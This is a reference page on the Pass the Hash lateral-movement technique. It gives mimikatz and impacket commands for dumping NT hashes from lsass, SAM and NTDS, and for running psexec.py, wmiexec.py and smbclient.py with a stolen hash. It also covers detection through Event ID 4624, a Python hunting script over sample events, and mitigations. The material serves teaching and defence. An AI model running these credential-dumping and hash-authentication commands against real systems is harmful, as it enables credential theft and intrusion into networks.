Pass the Hash

Lateral Movement

what is it?

Pass the Hash (PtH) is a technique that uses a captured NTLM hash (the NT hash, MD4 of the UTF-16LE password) to authenticate as a user without knowing their plaintext password. NTLM challenge-response never transmits or needs the plaintext: the client proves possession of the NT hash, so the hash itself is a password-equivalent credential. An attacker holding a valid hash can therefore authenticate to any service that accepts NTLM, including SMB, WMI, and RDP (only when Restricted Admin mode is enabled on the target), on every host where that account has rights.

requirements

  • A captured NT hash (from mimikatz sekurlsa::logonpasswords, impacket secretsdump, a SAM/NTDS dump, or similar)
  • Network access to the target (SMB/445 for psexec.py and smbclient.py, RPC/135 plus dynamic ports for wmiexec.py)
  • The account must have rights on the target (local admin for psexec.py and wmiexec.py; a local admin account with the same password on many hosts is the classic case)
  • Target must accept NTLM authentication (most Windows environments do; accounts in the Protected Users group cannot use NTLM at all)

attack steps

1. obtain a hash

# dump from lsass on a compromised host (needs SeDebugPrivilege or SYSTEM)
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

# remote dump via impacket (SAM/LSA secrets with local admin, or NTDS via DCSync with replication rights)
secretsdump.py domain/user:[email protected]

2. authenticate with the hash

# -hashes takes LMHASH:NTHASH; the LM half is left empty, which is why the value starts with ":"

# psexec with hash (uploads a service binary, runs as SYSTEM, noisy)
psexec.py -hashes :ntlmhash domain/[email protected]

# wmiexec (no service install, runs as the user, quieter)
wmiexec.py -hashes :ntlmhash domain/[email protected]

# smbclient (file access only, no code execution)
smbclient.py -hashes :ntlmhash domain/[email protected]

detection

  • Event ID 4624 with Logon Type 3 (network), Authentication Package NTLM and Logon Process NtLmSsp, for accounts or hosts that normally authenticate with Kerberos; on a domain controller, Event ID 4776 records the NTLM credential validation for the same account and corroborates it
  • Workstation names that do not match the asset inventory entry for the source IP (the name is supplied by the client, so attacker tooling shows its own hostname or leaves it blank), NTLM logons from non-Windows or non-inventoried hosts, and unusual source IPs for privileged accounts
  • Exclude ANONYMOUS LOGON null sessions from the NTLM rule or they will drown the signal; 4624 alone cannot distinguish a stolen hash from a typed password, so correlate with source-host telemetry (lsass access, suspicious process creation)
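The bullets above as hunting logic over exported 4624 data. This is an added example, not code from the original page: the events are constructed samples shaped like the EventData fields of Security 4624 exported to JSON, and the privileged-account set and the IP-to-hostname inventory are assumptions you would replace with your own AD groups and CMDB.

```python
"""Hunt for pass-the-hash style logons in 4624 data.

Added example, not from the original page. The events are constructed
samples shaped like the EventData fields of Security 4624 as exported to
JSON; the privileged-account set and IP-to-hostname inventory are assumed.
"""

# Tier-0 / privileged accounts that should only ever show Kerberos on the wire (assumed).
PRIVILEGED = {"corp\\administrator", "corp\\svc_backup"}
# Asset inventory: source IP -> the NetBIOS name it should present (assumed).
INVENTORY = {"10.0.1.50": "WS01", "10.0.1.51": "WS02"}

SAMPLE_EVENTS = [  # constructed sample events
    # normal Kerberos network logon from an inventoried workstation
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetDomainName": "CORP", "TargetUserName": "alice",
     "WorkstationName": "WS01", "IpAddress": "10.0.1.50", "Computer": "FS01"},
    # psexec.py-style: NTLM, privileged account, unknown source, foreign workstation name
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetDomainName": "CORP", "TargetUserName": "administrator",
     "WorkstationName": "KALI", "IpAddress": "10.0.9.9", "Computer": "FS01"},
    # NTLM from an inventoried IP whose client-supplied name does not match the inventory
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetDomainName": "CORP", "TargetUserName": "bob",
     "WorkstationName": "WS02", "IpAddress": "10.0.1.50", "Computer": "FS01"},
    # null session: NTLM by nature, excluded from this rule
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetDomainName": "NT AUTHORITY", "TargetUserName": "ANONYMOUS LOGON",
     "WorkstationName": "", "IpAddress": "10.0.1.77", "Computer": "FS01"},
    # interactive console logon, not a network logon
    {"EventID": 4624, "LogonType": 2, "AuthenticationPackageName": "Negotiate",
     "TargetDomainName": "CORP", "TargetUserName": "administrator",
     "WorkstationName": "DC01", "IpAddress": "127.0.0.1", "Computer": "DC01"},
]


def is_privileged(ev):
    return f"{ev['TargetDomainName']}\\{ev['TargetUserName']}".lower() in PRIVILEGED


def check_event(ev):
    """Return the reasons an event looks like pass-the-hash ([] if none)."""
    reasons = []
    # Only NTLM network logons are of interest; Kerberos, interactive and service logons are not.
    if ev.get("EventID") != 4624 or ev.get("LogonType") != 3:
        return reasons
    if ev.get("AuthenticationPackageName", "").upper() != "NTLM":
        return reasons
    # Null sessions are NTLM by nature and would drown the signal; track them separately.
    if ev.get("TargetUserName", "").upper() == "ANONYMOUS LOGON":
        return reasons
    if is_privileged(ev):
        reasons.append("NTLM network logon by privileged account; Kerberos expected")
    ip, ws = ev.get("IpAddress", ""), ev.get("WorkstationName", "")
    expected = INVENTORY.get(ip)
    if expected is None:
        reasons.append(f"source {ip} is not in the asset inventory")
    elif ws.upper() != expected.upper():
        # WorkstationName is supplied by the client, so a mismatch with the IP's
        # inventoried name means a foreign tool or a spoofed name.
        reasons.append(f"workstation name {ws} does not match {expected} for {ip}")
    return reasons


def hunt(events):
    """List of (target host, user, source IP, reasons) for every suspicious event."""
    hits = []
    for ev in events:
        reasons = check_event(ev)
        if reasons:
            hits.append((ev["Computer"], ev["TargetUserName"], ev["IpAddress"], reasons))
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Expect noise from legacy devices and appliances that genuinely use NTLM; baseline those as exceptions rather than loosening the privileged-account rule, since a tier-0 account authenticating with NTLM from anywhere is worth a ticket on its own.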

mitigation

  • Add privileged accounts to the Protected Users security group: members cannot authenticate with NTLM at all, and their credentials are not cached on the hosts they log on to
  • Restrict or disable NTLM via GPO (Network security: Restrict NTLM: Incoming NTLM traffic / Outgoing NTLM traffic to remote servers); start in audit mode to find legitimate NTLM users, then block
  • Enable Credential Guard so domain credentials are isolated from lsass and a memory dump no longer yields domain NT hashes; it does not protect local accounts in the SAM, so also randomize local admin passwords (e.g. with LAPS) to stop one local hash working on every host
  • Enforce tiered administration so domain admin credentials are never used on lower-tier workstations or servers, limiting where privileged hashes ever reach memory